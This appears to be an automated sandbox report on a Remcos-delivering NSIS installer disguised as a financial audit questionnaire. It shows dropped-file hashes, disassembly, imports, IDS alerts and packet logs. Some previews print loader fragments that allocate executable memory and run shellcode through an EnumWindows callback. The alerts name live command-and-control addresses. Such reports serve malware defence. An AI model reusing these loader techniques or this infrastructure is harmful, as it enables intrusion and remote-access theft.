                                                                                                  SSDEEP:12288:LT3+pPhNNWTa0MHtOuu3eX94XPmLu60KG/Io0xepP7:LTOFh/wa0MJy04ImIo0xeV
                                                                                                  MD5:062D1C81E070901A79DD61082776E239
                                                                                                  SHA1:10FABA35AD21DEA22CF6D72D402EBB8F42AFBD50
                                                                                                  SHA-256:88D17B90A4726EF4FCC8FA535915CBBEFC8F6D232A909C4E89B259A55777A981
                                                                                                  SHA-512:EC4BF7775AB19BBE1685D076AC935FBA654F66F4AD8DE7E892E00E519E011E9DE7D05C6B0162AE2A8D6A7613A97EF355776F8BCC35200D72D439051F8B4391BA
                                                                                                  Malicious:false
                                                                                                  Preview::#......,...................i...........\"......:#..........................................................................................................................................................................................................................................G...Y..........._...j...............................................................................................................................g..............................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.456297888280895
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:sEMBQEJkJVEjyX90dWxQoXUn:7XyWxvUn
                                                                                                  MD5:33714FD37D9159CF4911FE47896B9E69
                                                                                                  SHA1:77C9DDFB1CD8E4A9A0A9131D0D21EBAC0EF57611
                                                                                                  SHA-256:8EDA392D2CD028B1A3385FF7673CADE57E402248DB7FE7EB192E8D6B0D8F78A2
                                                                                                  SHA-512:E4ABAA9B5E706647DFE0174DAA5164D0464F7EE971C5EE2983E28A4D2062EDA2D0D9468340EBDBE6110B33958A9B3256757C3E5557B3EF617FE76CE576B8BA0A
                                                                                                  Malicious:false
                                                                                                  Preview:kernel32::VirtualAlloc(i 0,i 15241216, i 0x3000, i 0x40)p.r1
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):30
                                                                                                  Entropy (8bit):4.256564762130954
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                                  MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                                  SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                                                  SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                                  SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                                  Malicious:false
                                                                                                  Preview:user32::EnumWindows(i r1 ,i 0)
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52
                                                                                                  Entropy (8bit):4.0914493934217315
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                                  MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                                  SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                                  SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                                  SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                                  Malicious:false
                                                                                                  Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):435034
                                                                                                  Entropy (8bit):7.097103696725018
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:XT3+pPhNNWTa0MHtOuu3eX94XPmLu60KG/It:XTOFh/wa0MJy04ImIt
                                                                                                  MD5:43C2BFDDE822EE9A3128C34D78CC9602
                                                                                                  SHA1:12762A434C493C61E639567283271DF2E1A30FB1
                                                                                                  SHA-256:33CECCE1D60AE1EA7669C9C3C18DE07473CEEF446663D909B876A4AFEFDA4A75
                                                                                                  SHA-512:E2B4FD881FAE2DAB4DB46793EC95B73E1489C53BECF13B8617FACCC070B7D2587FFA84A2BCFCDF5BBC1729AC8738430EFEB7777D25A3756C5C10CB6182E4618F
                                                                                                  Malicious:false
                                                                                                  Preview:............TT......QQ................,.........2.....yyy..........................&.......;.e..----...###.ZZZ.....k.8.....................4444........ggg.....yyyy.............))....sss.......C.......................GGGG.E...."..............j..............;........`...>>>.....#....................!!!!!.P.....b........nnn...Z..........///.......8..................::::.........................H....:................. ..xxx.........N....hh..+.......'''............x....YY...............ddddd..............+............(.................rrr......F..;............A...#..PPPPPP.........FFFF.?.............@....y....I............|...................]..............&..................................7.........{..........QQ...._.....FFF..........???..........vvvvvv..................(.Z..|..........4......LLLLL.......////...........-......XX..ll........kkkk.........1...........z.............)..NN..........XXX.i.........................//................!!...XX......KK...z..&&&&&.......!!!.........mmmm
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):366017
                                                                                                  Entropy (8bit):1.2532028651885465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:dbvIzLHxoD5eNiie4lwAqTxNpy1eR0AByGhsjNV+k8jonGozrxNC/+BuLoi2DA9J:dI+LxNQtzwGxHzi+tbTYv4QFZfMG
                                                                                                  MD5:8DEF494BFC232DD8D9DA302DD0F500AD
                                                                                                  SHA1:1AD2FAA4B812AC0C6D01A262590DFC8066A9AE30
                                                                                                  SHA-256:2A45F95B9F82E3F400E065F16025346A5278BB03D55E3F3D3BB04837A32EF69E
                                                                                                  SHA-512:106D4C3277F0C5B374D725F042EEFBF241ACFE55899BD42EFF7D7CE56A4908FA3B5CFD75B7FFD3187D76357C85CDC7E82DC93FD9D076C8EF62704D316C2EB244
                                                                                                  Malicious:false
                                                                                                  Preview:...........2............................................m..........................Q..............{...._....................=...._..6.....c......................~................................"................5..................................../...................................................P....D....................................................O........................................o...................../....................................................................Z..."..........i.........................................................................4.rE......L.................7........................................................................t....................................q.....................................................p.............q....................................................................>..$.................(.......].............................................................+...................d.................................
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64501
                                                                                                  Entropy (8bit):4.60782989990884
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:Ouc/j4IGQTKgC05z7udyd47z7iXoBtbOcURwWgVCbGCJg8MfnmHNyTtg0NDZR:Ou04fIBhXoB1Kl9Jg+NyTtH9R
                                                                                                  MD5:974E3D824D2B9432159C5BEE4F7254AD
                                                                                                  SHA1:BB857F1221751D6A35488DDCAF2670403C655AAD
                                                                                                  SHA-256:B74ADE0ADB5EEA02A53465CD0DA8C81E257E8BCD5E2BAFEBDA377D57BDD6D969
                                                                                                  SHA-512:D1151DE70AF51F9561F848EB0C6910AF0BCE7C3477A076D9E18DCC59C0504F290D03125A48F59F0B2494B8D1C92A0DBE2190C1B236FF4600D1AE51AD7A756D29
                                                                                                  Malicious:false
                                                                                                  Preview:...........................VV............&....................................~~........R................N......^^..II......\........i..................$...........................{..U..//.......$.......\....XX...........~.m.999..vvvvv..z.4......m.......................I..;;;.....P.............gggg....]._____........1111.......................rrr...mm......::.....AA.......z.......................................\\........2.{.......____....O........_...................NNN....]....<<..H.............................LL.[........TTT..................00....................pp......z..7...p................ ..........................;.x../..S..............S...................++.......b.......G..OO.........TTT..N.V.....%...........^^.........................x.$..@.J.......g........zzz................kkkkk.w.......K.q.uu..EEE.~...c........s...QQ......g...............................................>>>>>...-...................................]....[[[.....___....<......^.......7..b.q...LLLLLL......
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):408
                                                                                                  Entropy (8bit):4.299736369748956
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:d10AgX3AR5XDgWIMF+3I/rb7HPkvQXkFt1gSuaAy:T0tX3iVkWIMF+3I/LP+QG1rr9
                                                                                                  MD5:04EA5F289C84B44129BCFA191ECED45B
                                                                                                  SHA1:E2505ED098F8B9815005EE58BDDACF40179C9D86
                                                                                                  SHA-256:9AA6257187EB745A66D35AE1536ECDB075E22CD48D941C5AE1AFE3287CF3FCEE
                                                                                                  SHA-512:798B8B1A5B0707CEBAD64414ABD7E238C3C4CBEF02696A6CDC98E3427406D74B47FF41B6DF1796F204FE58947156CDE8A332FC2B11884E724B54FC02C248450A
                                                                                                  Malicious:false
                                                                                                  Preview:blockhole hermafrodittens brawlingly seropus milieuomraadets annebeths..prolixity maskinstuers kattemaden fejltrinenes horoscoper everhart.tuskes superaspiration instinkterne gluneamie.applikationsprogrammrens forhekselserne hes bisamrottes gretel balaenoid datebook uniflowered..afrohaarets cholralosed forflg,didaktiker pseudophallic frskolealder squattiness ulotrichaceous consumation opgavesttets repos..
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):231219
                                                                                                  Entropy (8bit):1.2469505743129965
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kG1XbScC6kNorGiP8+Fq6BiOiqrcS3M6X7QQz82rc//gKj0OVdY0vLTRX34nSaIc:kPNj+/Vy6XTKjTZn5Wb/8
                                                                                                  MD5:B8DCFF52B32142B46BCF9E07C97FE39B
                                                                                                  SHA1:1DC3097327E42B862D9DAAA41F6B4DB8417D44B4
                                                                                                  SHA-256:1C74E5F1420689E862000BE741AE2B1E0E85861269454B028C231CCB7AB20260
                                                                                                  SHA-512:B6EB26FE2DA081E8CDFA0C0B9E7CF63F40EA561A6A743BD67D0B1564CEB354C7D7B26D28AB3060E381D0B8CD08B9E9E9F7FD03C63FE4750F02796E8B45F304FC
                                                                                                  Malicious:false
                                                                                                  Preview:...................*..................................&.....j...........2....................................]......*1....P......................I................T..................................7................................................................".......................................................\.....................f....5...............F..................{........h..................+..........Z.............................@.................A.@..............Q................................................................................................................................................................i...5.....G...................................................>1.................x...a...............7...........................................................&......................e....................................................<.k...........................................V..................................................................h...
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):439309
                                                                                                  Entropy (8bit):1.2535989842374102
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:BDBApFss1TiZa+ZJGxLn2CGfgUdqiY4H258QjjjIAfXMsSFa3C59X66JAqtkEBRU:cB7A32jjaikB4eNkPO+jvCMUB9
                                                                                                  MD5:A52FC0A739A55A6C379086CF33B63E8A
                                                                                                  SHA1:00F9D7338B1858C9625C2524CB30E9C01BCD70E1
                                                                                                  SHA-256:3D94DFA61B0EA65EB5D101A193BE132433B5C875342CBAF3107EB4F671C7155B
                                                                                                  SHA-512:2C816D9B05C5C9EADC5EC32A256619257D876296385D25DD3A2B7923D397045FD937BC9BEE9AB20C31F3E78E46FDEB45D8256635F9BA6E1D2619E2C03BFF12D3
                                                                                                  Malicious:false
                                                                                                  Preview:.....X................9.............Q........`..f.......7..................................... .........................|....O.................................B...t...................................................,..h.....................................................................,.....................................r.................................................................+.................................................v.........Q.............!........................................|...........................>.............................................#.................................................................................h.................E................6....k..................}.......................................[..........................:............................=..............................}..........f............................................................../......=...E............................................A...................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                  Entropy (8bit):7.715739019951405
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File size:777'304 bytes
                                                                                                  MD5:e1dc71be5b3466d47a4934013be9b604
                                                                                                  SHA1:4c6627a901ade3b1f0cd6a233085deb7e044ef97
                                                                                                  SHA256:1352efe35374bcc94f0b4e189761610a8620ff63aad350060a806773c969fd53
                                                                                                  SHA512:a44f75ea0eac848dd2b724b9a50fb5b0259382f61a047563689381e3a60fc07547c209b2acdddcb1dae371cdf51f0065e2a89ff0276299c0d72928af87c9aafc
                                                                                                  SSDEEP:12288:GtomEHbPQsIbw8Z9TzDBWzowh0Nxj5gUZVroN64V23i3Qo+eSp5:TN7PXIdZlDBWUrx5gAVroNFHzU
                                                                                                  TLSH:36F4F013FA63C1E7CF7EA3F2F6C3E5BB1DFDA4552D84955D16E2AAC26010E22050E225
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................`...*......Z3.......p....@
                                                                                                  Icon Hash:c9b9b9ad9b83e979
                                                                                                  Entrypoint:0x40335a
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x55C15CE6 [Wed Aug 5 00:46:30 2015 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                  Instruction
                                                                                                  sub esp, 000002D8h
                                                                                                  push ebx
                                                                                                  push ebp
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  push 00000020h
                                                                                                  xor ebp, ebp
                                                                                                  pop esi
                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                  mov dword ptr [esp+10h], 00409230h
                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                  call dword ptr [00407034h]
                                                                                                  push 00008001h
                                                                                                  call dword ptr [004070BCh]
                                                                                                  push ebp
                                                                                                  call dword ptr [004072ACh]
                                                                                                  push 00000009h
                                                                                                  mov dword ptr [004292B8h], eax
                                                                                                  call 00007F72D11556EEh
                                                                                                  mov dword ptr [00429204h], eax
                                                                                                  push ebp
                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                  push 000002B4h
                                                                                                  push eax
                                                                                                  push ebp
                                                                                                  push 004206A8h
                                                                                                  call dword ptr [0040717Ch]
                                                                                                  push 0040937Ch
                                                                                                  push 00428200h
                                                                                                  call 00007F72D1155359h
                                                                                                  call dword ptr [00407134h]
                                                                                                  mov ebx, 00434000h
                                                                                                  push eax
                                                                                                  push ebx
                                                                                                  call 00007F72D1155347h
                                                                                                  push ebp
                                                                                                  call dword ptr [0040710Ch]
                                                                                                  push 00000022h
                                                                                                  mov dword ptr [00429200h], eax
                                                                                                  pop edi
                                                                                                  mov eax, ebx
                                                                                                  cmp word ptr [00434000h], di
                                                                                                  jne 00007F72D1152799h
                                                                                                  mov esi, edi
                                                                                                  mov eax, 00434002h
                                                                                                  push esi
                                                                                                  push eax
                                                                                                  call 00007F72D1154D97h
                                                                                                  push eax
                                                                                                  call dword ptr [00407240h]
                                                                                                  mov ecx, eax
                                                                                                  mov dword ptr [esp+1Ch], ecx
                                                                                                  jmp 00007F72D115288Bh
                                                                                                  push 00000020h
                                                                                                  pop edx
                                                                                                  cmp ax, dx
                                                                                                  jne 00007F72D1152799h
                                                                                                  inc ecx
                                                                                                  inc ecx
                                                                                                  cmp word ptr [ecx], dx
                                                                                                  Programming Language:
                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x329e8.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x5f0a0x60005e32878b5f332958538d1180572efaacFalse0.6613362630208334data6.449510420642677IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x90000x202f80x600bdee9c3c56769fb763ba9ed65b414b2cFalse0.484375data3.832327307800933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x4a0000x329e80x32a002a1a63438510fc393e60de344f7865bbFalse0.40760030864197533data6.330044290302057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x4a3880x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.23011630639097744
                                                                                                  RT_ICON0x5ad880x9a00PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9756239853896104
                                                                                                  RT_ICON0x647880x9600Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.26375
                                                                                                  RT_ICON0x6dd880x5600Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.2945130813953488
                                                                                                  RT_ICON0x733880x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.31301700367647056
                                                                                                  RT_ICON0x777880x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.3628700657894737
                                                                                                  RT_ICON0x79d880x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.4375
                                                                                                  RT_ICON0x7af880xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.529296875
                                                                                                  RT_ICON0x7b9880x600Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.47265625
                                                                                                  RT_DIALOG0x7bf880x144dataEnglishUnited States0.5216049382716049
                                                                                                  RT_DIALOG0x7c0d00x100dataEnglishUnited States0.5234375
                                                                                                  RT_DIALOG0x7c1d00x11cdataEnglishUnited States0.6056338028169014
                                                                                                  RT_DIALOG0x7c2f00x60dataEnglishUnited States0.7291666666666666
                                                                                                  RT_GROUP_ICON0x7c3500x84dataEnglishUnited States0.7045454545454546
                                                                                                  RT_VERSION0x7c3d80x2d0dataEnglishUnited States0.49027777777777776
                                                                                                  RT_MANIFEST0x7c6a80x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                  ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                  ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-16T17:04:58.519187+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.64980866.63.187.3080TCP
                                                                                                  2024-12-16T17:05:02.498304+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649816162.251.122.872404TCP
                                                                                                  2024-12-16T17:05:04.748395+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649822162.251.122.872404TCP
                                                                                                  2024-12-16T17:05:04.952583+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649824178.237.33.5080TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 16, 2024 17:04:57.041085958 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:57.161236048 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:57.161324978 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:57.163186073 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:57.282859087 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.519109964 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.519186020 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.519186974 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.519201040 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.519221067 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.519237041 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.519548893 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.519562006 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.519644022 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.520003080 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.520016909 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.520029068 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.520056009 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.520117044 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.520617962 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.520632029 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.520677090 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.639205933 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.639305115 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.639324903 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.639348984 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.712004900 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.712039948 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.712069988 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.712094069 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.715440035 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.715487957 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.716682911 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.716731071 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.716784954 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.716823101 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.724590063 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.724644899 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.724703074 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.724809885 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.732979059 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.733022928 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.733077049 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.733145952 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.741774082 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.741822958 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.741879940 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.741977930 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.749866009 CET804980866.63.187.30192.168.2.6
